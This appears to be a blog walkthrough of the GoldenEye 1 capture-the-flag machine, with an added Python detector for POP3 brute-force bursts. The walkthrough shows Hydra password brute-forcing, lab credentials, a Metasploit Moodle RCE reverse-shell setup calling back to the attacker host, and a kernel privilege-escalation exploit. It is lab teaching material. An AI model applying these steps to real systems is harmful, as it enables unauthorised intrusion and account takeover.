Hello everyone, in this blog I am going to post a walkthrough of GoldenEye 1. This machine is for those who have basic knowledge and hands-on experience with penetration testing.
You can download the machine here.
Let’s begin!!
Target IP – 192.168.43.155
Attacker IP – 18.104.22.168
So, let’s start with scanning.
nmap -sC -sV -Pn -p- 192.168.43.155
OK!! We can see there are 4 ports open.
Now, let’s check the website running on port 80.
It says to navigate to /sev-home/.
OK, we need to log in.
So, I tried a few default usernames and passwords, but they didn’t work.
I thought of checking the page source.
OK, there is a terminal.js. Let’s open it.
We can see there is an HTML-encoded password and two usernames.
Let’s decode the password.
We got the password.
Let’s try to log in on /sev-home/.
Username – boris
Password – InvincibleHack3r
We logged in!!
I read the information written on the page.
The last sentence says POP3 is running on a non-default port.
The scan result also says there is POP3 running on port 55007.
Let’s brute-force POP3 with the usernames boris and natalya using the tool Hydra.
hydra -l boris -P /usr/share/wordlists/fasttrack.txt -f 192.168.43.155 -s 55007 pop3
hydra -l natalya -P /usr/share/wordlists/fasttrack.txt -f 192.168.43.155 -s 55007 pop3
We found passwords.
boris – secret1!
natalya – bird
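The Hydra runs on this page (boris and natalya here, doak later) all hammer port 55007 with the fasttrack wordlist, and that is exactly the pattern a mail server’s login log exposes to a defender. The following is an added example, not part of the original walkthrough: a Python detector over constructed Dovecot-style pop3-login lines (an assumption; the page never shows which POP3 server the target runs) that flags a source IP whose failed logins cluster inside a short window and notes any success that follows the burst.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample lines in Dovecot's pop3-login log style (assumption: the
# walkthrough does not show the target's POP3 server or its logs).
SAMPLE_LOG = """\
Jan 10 12:00:01 mail dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<boris>, method=PLAIN, rip=192.168.43.139, lip=192.168.43.155
Jan 10 12:00:01 mail dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<boris>, method=PLAIN, rip=192.168.43.139, lip=192.168.43.155
Jan 10 12:00:02 mail dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<boris>, method=PLAIN, rip=192.168.43.139, lip=192.168.43.155
Jan 10 12:00:02 mail dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<natalya>, method=PLAIN, rip=192.168.43.139, lip=192.168.43.155
Jan 10 12:00:03 mail dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<natalya>, method=PLAIN, rip=192.168.43.139, lip=192.168.43.155
Jan 10 12:00:04 mail dovecot: pop3-login: Login: user=<natalya>, method=PLAIN, rip=192.168.43.139, lip=192.168.43.155, mpid=1201
Jan 10 12:30:00 mail dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<boris>, method=PLAIN, rip=192.168.43.7, lip=192.168.43.155
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ dovecot: pop3-login: "
    r"(?P<event>Login|Disconnected \(auth failed[^)]*\)): user=<(?P<user>[^>]*)>"
    r".*?rip=(?P<rip>[\d.]+)")

def parse(log_text, year=2024):
    # Yield (timestamp, source ip, username, success?); syslog has no year, so supply one.
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            yield ts, m["rip"], m["user"], m["event"] == "Login"

def detect_bruteforce(log_text, threshold=5, window_s=60):
    """One alert per source IP whose densest run of failed logins within window_s seconds
    reaches threshold; 'cracked' lists users that then logged in from that IP."""
    by_ip = defaultdict(list)
    for ts, rip, user, ok in parse(log_text):
        by_ip[rip].append((ts, user, ok))
    alerts = []
    for rip, evs in by_ip.items():
        evs.sort()
        fails = [(ts, user) for ts, user, ok in evs if not ok]
        best, span, start = 0, (0, 0), 0
        for end in range(len(fails)):          # sliding window over the failures
            while (fails[end][0] - fails[start][0]).total_seconds() > window_s:
                start += 1
            if end - start + 1 > best:
                best, span = end - start + 1, (start, end)
        if best >= threshold:
            burst_end = fails[span[1]][0]
            alerts.append({"rip": rip, "failures": best,
                           "users": sorted({u for _, u in fails[span[0]:span[1] + 1]}),
                           "cracked": sorted({u for ts, u, ok in evs if ok and ts >= burst_end})})
    return alerts
```

A success from the same source right after the burst is the alert to act on first, since it means a wordlist password actually worked; a single stray failure from another host stays below the threshold and is ignored.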
Now, let’s connect to POP3 with the credentials using nc.
nc 192.168.43.155 55007
There are 3 messages. Let’s see.
It’s a message from admin to boris.
It’s a message from natalya to boris, saying that natalya can break boris’s codes.
In the 3rd message we can see the access codes are kept in the root directory, so we can’t access them from here.
Let’s move to natalya.
nc 192.168.43.155 55007
There are 2 messages. Let’s see.
It’s a message to natalya saying she has to stop breaking boris’s codes.
OK! We got some information here.
Before opening the domain we have to map severnaya-station.com to the server IP in /etc/hosts.
echo 192.168.43.155 severnaya-station.com >> /etc/hosts
Let’s check in the browser.
Now, let’s log in with the credentials we got in natalya’s mail.
After logging in, I was exploring and found another user’s chat in messages.
If we read it, it says:
My email username is “doak”.
Let’s brute-force POP3 again with doak as the username using Hydra.
hydra -l doak -P /usr/share/wordlists/fasttrack.txt -f 192.168.43.155 -s 55007 pop3
OK! We got the password “goat“.
Now, let’s connect to POP3 using nc.
nc 192.168.43.155 55007
So, we got the login credentials of doak.
We logged in as dr_doak.
I was checking every module to find a clue; in the module My private files I found a text file “s3cret.txt“.
I downloaded the file and checked whether we could find anything.
It says something is located in /dir007key/for-007.jpg.
So, I opened the above URL in the browser.
It’s an image, so I downloaded it and checked it.
OK! We can see an encoded string; it’s a base64-encoded string.
We got the plaintext string, and we know it is admin’s password.
We logged in as ADMIN.
Now, we should get a shell on our terminal.
I searched for a way to upload a file to get a reverse shell but didn’t find any.
After exploring, I found the website is “MOODLE” and found its version.
I checked whether there is an exploit for Moodle 2.2.3 and found there is a Remote Code Execution vulnerability.
So, I started the Metasploit Framework.
set password xWinter1995x!
set rhost severnaya-station.com
set targeturi /gnocertdir
set username admin
set payload cmd/unix/reverse
set lhost 192.168.43.139
set lport 4444
We got the shell.
Now we have to get root access,
so I got the version details.
I checked for an exploit and found one.
Let’s download it
and edit the code.
By default it uses gcc; change it to cc, as gcc isn’t available in the shell we got.
Save it and start a Python HTTP server.
python -m SimpleHTTPServer 8080
Now, let’s get the file into the shell we got.
cc exploit.c -o priv
Here, I got root access.